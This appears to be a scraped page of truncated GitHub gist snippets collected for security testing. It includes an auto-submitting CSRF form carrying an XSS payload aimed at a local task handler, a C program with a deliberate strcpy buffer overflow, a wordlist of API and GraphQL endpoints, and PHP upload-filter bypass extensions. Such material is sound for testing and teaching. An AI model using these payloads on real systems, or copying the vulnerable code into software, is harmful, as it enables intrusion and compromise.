π©βπ»
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Copyright 2019 Google LLC | |
# | |
# Licensed under the Apache License, Version 2.0 (the "License"); | |
# you may not use this file except in compliance with the License. | |
# You may obtain a copy of the License at | |
# | |
# http://www.apache.org/licenses/LICENSE-2.0 | |
# | |
# Unless required by applicable law or agreed to in writing, software | |
# distributed under the License is distributed on an "AS IS" BASIS, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
Β <body> | |
Β <script>history.pushState('', '', '/')</script> | |
Β <form action="http://127.0.0.1:8080/example_task_handler" method="POST" enctype="text/plain"> | |
Β <input type="hidden" name="<img src" value="x OnError=alert("xss")>" /> | |
Β <input type="submit" value="Submit request" /> | |
Β </form> | |
Β <script> | |
Β document.forms[0].submit(); | |
Β </script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Copyright 2019 Google LLC | |
# | |
# Licensed under the Apache License, Version 2.0 (the "License"); | |
# you may not use this file except in compliance with the License. | |
# You may obtain a copy of the License at | |
# | |
# http://www.apache.org/licenses/LICENSE-2.0 | |
# | |
# Unless required by applicable law or agreed to in writing, software | |
# distributed under the License is distributed on an "AS IS" BASIS, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<title>Tasks Sample</title> | |
</head> | |
<body> | |
<p>Printed task payload: {{ payload }}</p> | |
</body> | |
</html> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <string.h> | |
int main(int argc, char **argv) { | |
char example[10]; | |
strcpy(example, argv[1]); | |
printf("%s\n", example); | |
return 0; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
api/v3/graphql | |
graphql/v3 | |
api/v4/graphql | |
graphql/v4 | |
v3/graphql | |
v4/graphql | |
api/v3 | |
api/v4 | |
v3/api | |
v4/api |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<body class="align"> | |
<div class="grid"> | |
<form action="https://httpbin.org/post" method="POST" class="form login"> | |
<div class="form__field"> | |
<label for="login__username"><svg class="icon"> | |
<use xlink:href="#icon-user"></use> | |
</svg><span class="hidden">Username</span></label> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
php%20 | |
php%0a | |
php%00 | |
php%0d%0a | |
php/ | |
php.\ | |
phar | |
php.... | |
pHp5.... | |
phpJunk123png |
OlderNewer